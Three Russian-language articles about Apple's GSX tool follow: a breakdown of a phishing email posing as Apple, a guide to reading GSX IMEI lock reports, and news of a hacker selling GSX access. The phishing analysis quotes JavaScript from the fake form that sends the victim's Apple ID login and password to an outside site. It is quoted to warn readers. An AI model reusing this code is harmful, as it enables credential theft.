Внимание! Сегодня нам на почту пришло странное письмо… от Apple
На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.
Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.
Само письмо выглядит следующим образом:
Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.
Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.
GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.
Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected] — в том же домене, что и Apple и без дополнительных приписок.
Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:
Разумеется, вводить Apple ID в подозрительное окно мы не стали.
В прикрепленном файле был обнаружен следующий код:
[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]
Он передает логин и пароль на сайт nubetelstore.com
В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.
Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.
Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.
Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.
Источник
Расшифровка проверок по ІМЕІ для iPhone: учимся «читать» GSX
Заказав проверку по IMEI или SN (серийному номеру) для iPhone или iPad, важно уметь правильно его прочесть и расшифровать полученную информацию. Поддержка imei -server всегда готова помочь с расшифровкой любого результата ( support@imei-server.ru) , но если Вы предпочитаете разбираться во всем самостоятельно, эта статья поможет Вам научится правильно «читать» результаты GSX отчетов.
Давайте рассмотрим ключевые строки разных проверок и определим, что означает соответствующий результат.
Проверка GSX предназначена в первую очередь для того, чтобы проверять статус блокировки устройства — залочено на оператора или нет, но в нее может быть включено много других дополнительных данных. Вид результатов от разных провайдеров может сильно отличатся и иногда это просто сплошной текст, без разделения по срокам. В таком случае особенно важно знать, какую именно информацию нужно искать и на что смотреть.
.jpg)
Статус блокировки всегда отображают две важные строки и обе нужно принимать во внимание. Самой главной, решающей, является именно первая строка:
- «Next Tether Policy Description:» — Описание поточной политики привязки.
- «Unlock Date: Unlocked:»— Дата разлочки и статус разлочки
Next Tether Policy Description : Multi-Mode Unlock — значит телефон однозначно разлочен и будет принимать другие SIM-карты. Вторая строка при этом может отображать такие данные:
- «Unlock Date: 29/12/16 Unlocked: true» — прописана дата разлочки и статус разлочки.
- «Unlock Date: Unlocked: false» — если первая строка показывает unlock, а информации о дате разлочки нет, то это значит, что телефон разлочен, просто он не был активирован. После установки сим-карты и обновления телефона, дата разлочки «пропишется» автоматически. Повторный результат проверки по IMEI, заказанный после активации, уже будет отображать дату разлочки и она будет соответствовать дате активации устройства.
Next Tether Policy Description: US Sprint/MVNO Locked Policy — значит в данный момент iPhone заблокирован и не будет принимать другие SIM-карты. В этом примере показана блокировка на оператора Спринт США. Блокировка на любого другого оператора будет выглядеть точно так же.
- «Unlock Date: Unlocked: false» — когда первая строка показывает locked, то во второй строке тоже не должно быть никакой информации. Это значит что мы имеем дело с обычным заблокированным устройством, которое не проходило процедуру разлочки.
- «Unlock Date: 29/12/16 Unlocked: true» — если согласно первой строке телефон залочен, а вторая строка напротив — отображает дату разлочки и статус « Unlocked: true », то это значит в наших руках устройство, которое проходило разлочку, но unlock «слетел» и оно заблокировалось повторно. Такое «противоречие» в результате – это клаcсический пример релока (re-lock– повторная блокровка).
Стоит отметить, что повторная разлочка телефонов, по которым уже был релок, с большой вероятностью будет временной и со временем точно так же «слетит». Невозможно спрогнозировать, насколько долго такое устройство сможет успешно обновляться.
Next Tether Policy Description: 2116 Russia Reseller Unlock Policy— iPhone не залочен и будет принимать любые SIM-карты. Некоторые устройства по умолчанию не имеют привязки к какой либо сети. По таких устройствах Вы всегда будете видеть в главной строке имя реселлера с приставкой « Unlock Policy ».
- « Unlock Date: Unlocked: false» — телефон не залочен, но не был активирован.
- «Unlock Date: 29/12/16 Unlocked: true» — телефон не залочен, указанная дата «разлочки» — это дата его активации SIM-картой.
Next Tether Policy Description: US GSM/VZW N61/N56 Service Policy – в данном случае нет ни слова locked , ни unlocked , но этот iPhone залочен. Тут мы имеем дело с блокировкой на регион, а не на конкретного оператора. Другие примеры региональной блокировки выглядят так:
- Next Tether Activation Policy Description: USA GSM Default Policy
- Next Tether Activation Policy Description: APAC Service
- Next Tether Activation Policy Description: EMEA Service
- Next Tether Policy Details: Latin America Service
- Next Tether Activation Policy Description: Canada Service
Next Tether Policy Details US Reseller Flex Policy – в этом примере мы видим еще один тип – «гибкой политики привязки». Такой результат характерен для устройства, которое еще не было активировано. Телефон «привяжется» к тому оператору, SIM-карту которого в него установят первой. При таком результате главной строки вторая всегда выглядит так:
- «Unlock Date: Unlocked: false» — телефон залочен и не был активирован.
После того как мы рассмотрели основные правила определения статуса блокировки на оператора, давайте рассмотрим, какую еще информацию может содержать GSX отчет.
Initial Activation Policy Details/ Initial Activation Policy Description/ Initial Activation – разные названия той же строки: содержит информацию о начальной политике активации. Если в этой строке нет никакой информации, значит устройство не было активировано SIM-картой. В отдельных примерах вместо пустой строки может быть указано – « Not Available » (данные не доступны), что по сути одно и то же. После активации в этой строке буде прописан оператор, SIM-картой которого телефон был активирован. Для устройств, которые изначально не блокируются, там может сразу быть прописано « Multi-Mode Carrier Policy »
Initial Activation Policy ID: — идентификатор начальной политики активации. Это номер, который обозначает политику определенного типа. Довольно часто этот номер не выносят в отдельную строку, а указывают сразу перед названием оператора/типа политики. Примеры:
- 2174 US Sprint/MVNO Locked Policy
- 2104 P10x Multi-Mode Carrier Policy
- 2116 Russia Reseller Unlock Policy
- 261 Singapore StarHub Unlocked Policy
Applied Activation Details/ Applied Activation Policy Description/ Applied Activation– разные названия той же строки: содержит информацию о применяемой политике активации. Содержит те же данные, что и Initial Activation Policy.
ICCID (Integrated Circuit Card IDentifier) – это длинный номер-идентификатор SIM-карты. Он уникален для каждой SIM-карты и говорит о том, что устройство активировано и используется. Для не активированного устройства эта информация не будет доступной.
MAC Address – это номер-идентификатор, состоящий из латинских больших букв и цифр, который важен при выходе в сеть. Этот номер для некоторых Wi-Fi-роутеров нужно прописывать вручную, указывая, устройства с какими Mac-адресами могут выходить через него в Интернет.
Product iOS Version/ Product Version – версия операционной системы (на момент заказа проверки).
First Unbrick Date – это дата первого восстановления через iTunes.
Unlock Date – это дата разлочки. Если телефон по умолчанию не был залочен, эта дата будет соответствовать дате активации устройства SIM-картой.
Unlocked: – это статус блокировки. Тут может быть прописано либо « Yes/No », либо « true/false ».
В редких случаях для отдельных проверок, GSX может быть дополнен данными о стране продажи, продавце, статусе гарантии и контракта. Это такие строки:
Purchase Country: – страна продажи
Estimated Purchase Date: – дата продажи
Registration Date: – дата регистрации
Warranty Status: – статус гарантии
Apple Limited Warranty Days Remaining: – сколько дней осталось до окончания гарантии
Contract Details Contract Type:– тип контракта
Contract Coverage Start Date:– дата начала контракта
Contract Coverage End Date:– дата окончания контракта
.png)
При заказе проверки стоит учитывать то, что результат может отличатся от примера в описании услуги, поскольку мы можем периодически сотрудничать с разными провайдерами, подключаясь к самому быстрому или доступному в данный момент серверу. И если Вам принципиально важно получить конкретную информацию в отчете GSX, всегда уточняйте в поддержке до оформления заказа, какова вероятность того, что эти данные точно будут в Вашем результате. Для GSX строками, которые всегда присутствуют в любом результате, являются данные о изначальной политике активации, поточной политике привязки и статусе блокировки. Все остальные данные являются дополнительными.
Источник
Хакер предлагает доступ к внутренним инструментам Apple
Хакер утверждает, что имеет доступ к системе Apple Global Service Exchange (GSX).
В течение последних нескольких лет хакеры и различного рода мошенники активно пытаются сыграть на популярности компании Apple будь то с целью вымогательства либо обмана ее клиентов. По данным издания ZDNet, некий хакер предлагает доступ к внутренним инструментам Apple, позволяющим получить данные учетных записей клиентов компании. На своей странице в Twitter он разместил несколько скриншотов, предположительно свидетельствующих о наличии доступа к системе Apple Global Service Exchange (GSX), использующейся сотрудниками компании для обработки пользовательских заявок на ремонт и послепродажной поддержки.
Журналисты связались с автором публикации с целью проверить правдивость его заявлений. Они предоставили хакеру серийный номер смарт-часов Apple Watch и спустя несколько минут получили скриншот с верной информацией о модели, серии и типе устройства. Помимо данной информации, скриншот не содержал других сведений. Хакер также отказался предоставить информацию из учетной записи, связанной с гаджетом, несмотря на заявления в своем профиле.
На ломаном английском хакер рассказал, что получил учетные данные для системы Apple с помощью «частного эксплоита», и ежедневно продает доступ к ней по меньшей мере 20 пользователям. Правда, никаких доказательств своим словам он не предоставил.
По словам источника в компании Apple, речь идет о «тестовой версии» инструмента GSX, использующейся только для разработки. Каким образом хакеру удалось получить доступ к системе в настоящее время неясно.
Напомним, в начале февраля нынешнего года на GitHub был опубликован исходный код загрузчика iOS – iBoot. Хотя юристы Apple позаботились об его оперативном удалении из открытого доступа, в конце того же месяца группировка Dark-Liberty Team снова разместила его на сайте iBoot Source Code Leak – Reloaded, доступном только через Tor.
Источник
